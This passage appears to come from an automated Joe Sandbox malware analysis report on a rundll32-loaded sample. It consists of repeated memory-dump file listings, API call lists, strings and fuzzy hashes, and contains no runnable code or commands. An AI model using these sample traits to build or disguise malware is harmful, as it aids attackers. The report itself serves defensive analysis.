                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                          • API String ID: 3472027048-4255013377
                          • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                          • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                          • GetTickCount.KERNEL32 ref: 0040D9A6
                          • GetTickCount.KERNEL32 ref: 0040D9BF
                          • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                          • GetTickCount.KERNEL32 ref: 0040DA2C
                          • GetTickCount.KERNEL32 ref: 0040DA65
                          • GetTickCount.KERNEL32 ref: 0040DA93
                          • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CountTick$CurrentThread
                          • String ID:
                          • API String ID: 3968769311-0
                          • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                          • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32 ref: 0040D60A
                          • GetProcAddress.KERNEL32 ref: 0040D619
                          • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInformationLogicalModuleProcProcessor
                          • String ID: GetLogicalProcessorInformation$kernel32.dll
                          • API String ID: 4292003513-812649623
                          • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                          • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                          • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                          • String ID:
                          • API String ID: 3559396350-0
                          • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                          • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902816012.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902857796.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902901610.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902943399.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903004148.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903047347.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903092323.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903138276.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903199239.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903289649.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903331628.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903372313.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903416510.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903459554.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903510167.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2903562666.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFileLast$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 1269242970-0
                          • Opcode ID: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                          • Opcode Fuzzy Hash: f95636084fb0cf0d0bf634a45240882383bfcb303348400ebd39aae63f895444
                          • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2901146485.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2901089143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901146485.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901792198.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901842033.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901894617.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2901936209.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902012564.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902062195.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902148715.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902204151.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902238115.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902273884.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902308536.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902345989.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902402196.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902442956.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902480411.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902517959.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902557624.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902603807.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902642131.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902685693.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902727325.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000E.00000002.2902771042.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
